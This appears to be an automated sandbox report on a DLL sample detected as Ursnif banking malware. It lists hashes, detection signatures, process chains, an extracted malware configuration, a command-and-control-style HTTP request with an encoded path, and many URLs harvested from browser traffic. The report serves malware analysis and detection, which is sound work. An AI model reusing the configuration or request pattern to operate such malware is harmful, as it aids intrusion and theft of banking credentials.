Play interactive tour

Edit tour

Analysis Report f0t0s.dll

Overview

General Information

Sample Name:	f0t0s.dll
Analysis ID:	342512
MD5:	eecfc005c040236b5818d7e8f775ffed
SHA1:	42bb1cfe2532023f6a099328e7a8f08dcd145231
SHA256:	cd773a8e18731c4d551faf1dcc8eb050c7eac19c9758a145f91c1dfa79361db8
Most interesting Screenshot:

Detection

Ursnif

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Ursnif

Machine Learning detection for sample

PE file has a writeable .text section

Writes or reads registry keys via WMI

Writes registry values via WMI

Antivirus or Machine Learning detection for unpacked file

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 6932 cmdline: loaddll32.exe 'C:\Users\user\Desktop\f0t0s.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)

regsvr32.exe (PID: 6940 cmdline: regsvr32.exe /s C:\Users\user\Desktop\f0t0s.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

cmd.exe (PID: 6948 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

iexplore.exe (PID: 6972 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 7016 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6288 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:17428 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 4972 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:82960 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

Threatname: Ursnif

{"server": "12", "whoami": "user@179605ceL", "dns": "179605", "version": "250171", "uptime": "360", "crc": "1", "id": "7247", "user": "4229768108f8d2d8cdc8873a1a309995", "soft": "3"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000001.00000003.729247214.00000000050A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.729212417.00000000050A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.729069963.00000000050A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.729161495.00000000050A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000002.1028497045.00000000050A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.729268110.00000000050A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.729280419.00000000050A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.729190744.00000000050A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.729230309.00000000050A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: regsvr32.exe PID: 6940	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 5 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: regsvr32.exe.6940.1.memstr

Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@179605ceL", "dns": "179605", "version": "250171", "uptime": "360", "crc": "1", "id": "7247", "user": "4229768108f8d2d8cdc8873a1a309995", "soft": "3"}

Machine Learning detection for sample

Show sources

Source: f0t0s.dll

Joe Sandbox ML: detected

Source: 1.2.regsvr32.exe.380000.1.unpack

Avira: Label: TR/Crypt.XPACK.Gen8

Compliance:

Uses 32bit PE files

Show sources

Source: f0t0s.dll

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49753 version: TLS 1.2

Spreading:

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_00BA523C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,

1_2_00BA523C

Networking:

Source: Joe Sandbox View

IP Address: 151.101.1.44 151.101.1.44

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Source: global traffic

HTTP traffic detected: GET /images/UX6NBxejGKuiww/O5lNkgT6UNtIOi_2F9bva/Qprmk34fIbO879qt/MdtrogqLmF_2Fqf/_2FF2F05EKst9Z1EEw/f4caZYYsT/SAZrEW2lvj_2BEojoTxU/tDJE5vtOctKZ_2FKqji/N5plaj5Qq3lxm6IFqAOkT_/2FkRoPIQCjapM/McWFMQds/m87yGEYxK6DYnqXLcn6Sf84/1Yi_2FiH.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ocsp.sca1b.amazontrust.comConnection: Keep-Alive

Source: de-ch[1].htm.4.dr	String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: de-ch[1].htm.4.dr	String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen\|https://twitter.com/i/notifications;Ich\|#;Abmelden\|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
Source: de-ch[1].htm.4.dr	String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"   Ref 2: "+e.html(t.clientSettings.sid\|\|"000000")+"   Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console\|\|{}).timeStamp?console.timeStamp(n):(r.performance\|\|{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen\|https://outlook.live.com/mail/deeplink/compose;Kalender\|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online\|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online\|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway\|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online\|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: de-ch[1].htm.4.dr	String found in binary or memory: http://ogp.me/ns#
Source: de-ch[1].htm.4.dr	String found in binary or memory: http://ogp.me/ns/fb#
Source: auction[1].htm.4.dr	String found in binary or memory: http://popup.taboola.com/german
Source: {49A9FD30-5BB8-11EB-90EB-ECF4BBEA1588}.dat.3.dr	String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
Source: f0t0s.dll	String found in binary or memory: http://www.symantec.com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://amzn.to/2TTxhNg
Source: auction[1].htm.4.dr	String found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&ap
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://bealion.com/politica-de-cookies
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://channelpilot.co.uk/privacy-policy
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://client-s.gateway.messenger.live.com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://clk.tradedoubler.com/click?p=245744&a=3064090&g=21863656
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24903118&epi=ch-de
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=295926&a=3064090&g=24886692&epi=de-ch
Source: {49A9FD30-5BB8-11EB-90EB-ECF4BBEA1588}.dat.3.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&http
Source: {49A9FD30-5BB8-11EB-90EB-ECF4BBEA1588}.dat.3.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: {49A9FD30-5BB8-11EB-90EB-ECF4BBEA1588}.dat.3.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://docs.prebid.org/privacy.html
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: auction[1].htm.4.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://itunes.apple.com/ch/app/microsoft-news/id945416273?pt=80423&ct=prime_footer&mt=8
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://linkmaker.itunes.apple.com/assets/shared/badges/de-de/appstore-lrg.svg"
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://listonic.com/privacy/
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1611213266&rver
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1611213266&rver=7.0.6730.0&am
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/logout.srf?ct=1611213267&rver=7.0.6730.0&lc=1033&id=1184&lru=
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&rpsnv=13&ct=1611213266&rver=7.0.6730.0&w
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/#qt=mru
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/about/en/download/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com;Fotos
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com;OneDrive-App
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://outlook.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://outlook.live.com/calendar
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&hl=de-ch&refer
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://portal.eu.numbereight.me/policies-license#software-privacy-notice
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://quantyoo.de/datenschutz
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://related.hu/adatkezeles/
Source: {49A9FD30-5BB8-11EB-90EB-ECF4BBEA1588}.dat.3.dr	String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&campid=533862
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=travelnavlink
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch"
Source: imagestore.dat.4.dr, imagestore.dat.3.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cWKuB.img?h=368&amp
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://support.skype.com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://twitter.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://twitter.com/i/notifications;Ich
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.admo.tv/en/privacy-policy
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-ss&ued=htt
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.bet365affiliates.com/UI/Pages/Affiliates/Affiliates.aspx?ContentPath
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.bidstack.com/privacy-policy/
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.brightcom.com/privacy-policy/
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.gadsme.com/privacy-policy/
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/
Source: {49A9FD30-5BB8-11EB-90EB-ECF4BBEA1588}.dat.3.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/80-k%c3%a4lber-aus-brennendem-stall-evakuiert/ar-BB1cVbsV?ocid=
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/aargau-schickt-mittel-und-berufssch%c3%bcler-in-fernunterricht/
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/bus-mit-eis-und-schnee-beworfen-jugendliche-festgenommen/ar-BB1
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/ein-werbespot-f%c3%bcrs-entsorgungsamt-der-schlecht-ankommt/ar-
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/er-will-%c3%bcberrascht-werden-am-liebsten-von-sich-selber/ar-B
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/judenhass-kampfsport-und-waffen-f%c3%bcr-den-rassenkrieg-wie-si
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/kopf-der-winterthurer-eisenjugend-verhaftet/ar-BB1cVDBd?ocid=hp
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/sexuelle-%c3%bcbergriffe-bei-medizinischer-massage/ar-BB1cW8f7?
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/stadtpr%c3%a4sidentin-corine-mauch-r%c3%a4umt-mitschuld-des-sta
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/z%c3%bcrich-erh%c3%a4lt-zwei-kulturdirektorinnen/ar-BB1cVvSE?oc
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.remixd.com/privacy_policy.html
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_shop_de&utm
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.skype.com/
